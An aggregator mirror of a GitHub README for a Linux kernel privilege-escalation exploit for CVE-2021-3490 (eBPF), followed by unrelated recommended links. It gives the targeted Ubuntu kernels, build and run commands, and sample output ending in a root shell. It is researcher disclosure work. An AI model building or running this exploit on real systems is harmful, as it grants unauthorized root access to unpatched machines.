GitHub - chompie1337/Linux_LPE_eBPF_CVE-2021-3490
source link: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Linux_LPE_eBPF_CVE-2021-3490
LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.
author: @chompie1337
For educational/research purposes only. Use at your own risk.
Usage:
To build for Ubuntu 20.10 (Groovy Gorilla):
make groovy
To build for Ubuntu 21.04 (Hirsute Hippo):
make hirsute
To run:
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#
Note: You must cleanly exit the root shell by typing exit
to perform cleanup and avoid a kernel panic.
Checkout the writeup Kernel Pwning with eBPF: a Love Story.
This research was sponsered by Grapl.
Recommend
-
52
From leaked kernel-mode process handle to SYSTEM XIGNCODE3 is a popular anti-cheat solution provided on a B2B2C basis, predominantly found in online games. This class of software is known for its invasive natur...
-
34
最近发布的 Linux 内核带了一个针对内核的能力强大的 Linux 监控框架。它起源于历史上人们所说的的 BPF。 BPF 是什么? BPF (Berkeley Packet Filter) 是一个非常高效的网络包过滤机制,它的目标是避免不必要的用户空...
-
32
引言 可能很多工程师都听说过或者用过Solaris上的DTrace,都被其强大的功能,灵活的用法所吸引。但是,多年来Linux上一直没有对应的工具。虽然,systemtap可以部分替代,但是在很多方面systemtap都不尽如人意。 不过...
-
14
Linux bcc/eBPF tcpdrop 31 May 2018 While debugging a production issue of kernel-based TCP packet drops, I remembered seeing a new function added in Linux 4.7 by Eric Dumazet (Google) called tcp_drop(), which I can trace usin...
-
5
Introduction: In this article we will explore ‘Apport’, the Ubuntu crash handler. When an application crashes Apport is executed by the kernel, reads information about the crashed process, and then creates a crash report that can be...
-
10
Files Permalink Latest commit message Commit time
-
11
Intel 31.0.101.3490 Windows driver brings Arc A770 and A750 support, and more...
-
5
英特尔发布Arc显卡驱动程序31.0.101.3490:支持Arc A7系列显卡
-
4
Intel Arc 31.0.101.3490 driver adds support for Gotham Knights, Ghostbusters, more...
-
3
Exploiting CVE-2021-3490 for Container Escapes Original text by
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK